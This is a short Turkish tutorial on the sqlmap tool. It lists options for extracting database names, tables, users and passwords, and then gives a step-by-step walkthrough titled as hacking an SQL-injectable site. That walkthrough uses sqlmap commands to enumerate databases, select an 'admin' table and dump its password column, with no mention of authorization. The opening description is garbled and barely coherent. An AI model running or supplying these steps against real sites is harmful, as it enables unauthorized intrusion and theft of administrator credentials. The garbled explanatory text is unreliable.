Sqlmap Nedir?
Sqlmap açık kaynak kodlu sql injection açıklığı tespit ve kötüye kullanma
aracıdır. Hedefe ulaşmak için kullanılan web sunucularını kullanan arşiv birimleri çeşitli sorgular/komutlar ile sistem üzerindeki sql enjeksiyon tipini tespit eder yine de içerdiğini kullandığına göre çeşitli bilgileri hedef koleksiyonlarından alır.
2-Sqlmap Verileri ve Parametreleri
Veritabanı türü ve versiyonu (–banner,–all)
Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs)
Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns)
Veritabanı datası(–dump, –dump-all)
Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users)
Veritabanı kullanıcısının parolası (–passwords)
Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba)
Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f)
URL (–url, -r )
Burp suite ve WebScarp proxy logu (–log , -l)
HTTP taleplerinin bir dosyadan okunulması (–r)
Google üzerinden URL toplayıp input olarak alabilmek(-g)
/sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)
3-Sql map ile sql açıklı site hackleme
(root)Terminal'i açın sql açıklı site bulduktan sonra sıra db cekmede Tekrardan terminale geçin ve aşağıdaki kodu terminale yazın. Bu kod sitedeki databaseleri bulmamıza yardımcı olucaktır
sqlmap -u açıklı site --dbs
Gelen [y/N] sorularına y yazarak enterliyoruz.
Şimdi Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.
sqlmap -u açıklısite -D database adı --table
Gördüğünüz gibi tablolar önümüze geldi Burda bizim yöneleceğimiz tablo "admin,user,superadmin" gibi tablolar olacak. Bu sitede "admin" tablosu olduğu için ben admin tablosunu kullanacağım. Aşağıdaki koddan tablo seçiyoruz ve columnlarını buluyoruz.
sqlmap -u açıklısite -D database adı -T admin --column
Colunumları gördük bunlar : id,identifiant,nom ve password. Şimdi bunları göstermeye gelelim ( admin şifresi id adı vs.) Kodu aşağıdaki gibi yazın.
sqlmap -u açıklısite -D database -T admin -C colunmlar --dump
NOT:BAZI KISIMLAR ALINTIDIR!!!